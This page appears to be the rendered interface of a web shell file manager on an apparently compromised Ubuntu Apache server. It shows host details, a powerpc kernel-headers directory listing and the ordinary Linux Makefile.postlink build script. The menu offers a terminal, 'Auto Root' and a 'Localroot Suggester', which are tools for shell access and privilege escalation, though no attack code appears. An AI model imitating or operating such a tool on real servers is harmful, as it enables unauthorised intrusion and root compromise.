Linux tsuru-no-tsurugi 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.0.18 & Your IP : 216.73.216.68
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
linux-headers-5.15.0-185 /
arch /
powerpc /
Delete
Unzip
Name
Size
Permission
Date
Action
boot
[ DIR ]
drwxr-xr-x
2026-06-27 06:50
crypto
[ DIR ]
drwxr-xr-x
2026-06-27 06:50
include
[ DIR ]
drwxr-xr-x
2026-06-27 06:50
kernel
[ DIR ]
drwxr-xr-x
2026-06-27 06:50
kexec
[ DIR ]
drwxr-xr-x
2026-06-27 06:50
kvm
[ DIR ]
drwxr-xr-x
2026-06-27 06:50
lib
[ DIR ]
drwxr-xr-x
2026-06-27 06:50
math-emu
[ DIR ]
drwxr-xr-x
2026-06-27 06:50
mm
[ DIR ]
drwxr-xr-x
2026-06-27 06:50
net
[ DIR ]
drwxr-xr-x
2026-06-27 06:50
perf
[ DIR ]
drwxr-xr-x
2026-06-27 06:50
platforms
[ DIR ]
drwxr-xr-x
2026-06-27 06:50
purgatory
[ DIR ]
drwxr-xr-x
2026-06-27 06:50
sysdev
[ DIR ]
drwxr-xr-x
2026-06-27 06:50
tools
[ DIR ]
drwxr-xr-x
2026-06-27 06:50
xmon
[ DIR ]
drwxr-xr-x
2026-06-27 06:50
Kbuild
382
B
-rw-r--r--
2021-11-01 05:53
Kconfig
36.83
KB
-rw-r--r--
2026-06-20 00:54
Kconfig.debug
11.29
KB
-rw-r--r--
2026-06-20 00:54
Makefile
14.88
KB
-rw-r--r--
2026-06-20 00:54
Makefile.postlink
1.17
KB
-rw-r--r--
2021-11-01 05:53
Save
Rename
# SPDX-License-Identifier: GPL-2.0 # =========================================================================== # Post-link powerpc pass # =========================================================================== # # 1. Check that vmlinux relocations look sane PHONY := __archpost __archpost: -include include/config/auto.conf include scripts/Kbuild.include quiet_cmd_head_check = CHKHEAD $@ cmd_head_check = $(CONFIG_SHELL) $(srctree)/arch/powerpc/tools/head_check.sh "$(NM)" "$@" quiet_cmd_relocs_check = CHKREL $@ ifdef CONFIG_PPC_BOOK3S_64 cmd_relocs_check = \ $(CONFIG_SHELL) $(srctree)/arch/powerpc/tools/relocs_check.sh "$(OBJDUMP)" "$(NM)" "$@" ; \ $(BASH) $(srctree)/arch/powerpc/tools/unrel_branch_check.sh "$(OBJDUMP)" "$(NM)" "$@" else cmd_relocs_check = \ $(CONFIG_SHELL) $(srctree)/arch/powerpc/tools/relocs_check.sh "$(OBJDUMP)" "$(NM)" "$@" endif # `@true` prevents complaint when there is nothing to be done vmlinux: FORCE @true ifdef CONFIG_PPC64 $(call cmd,head_check) endif ifdef CONFIG_RELOCATABLE $(call if_changed,relocs_check) endif %.ko: FORCE @true clean: rm -f .tmp_symbols.txt PHONY += FORCE clean FORCE: .PHONY: $(PHONY)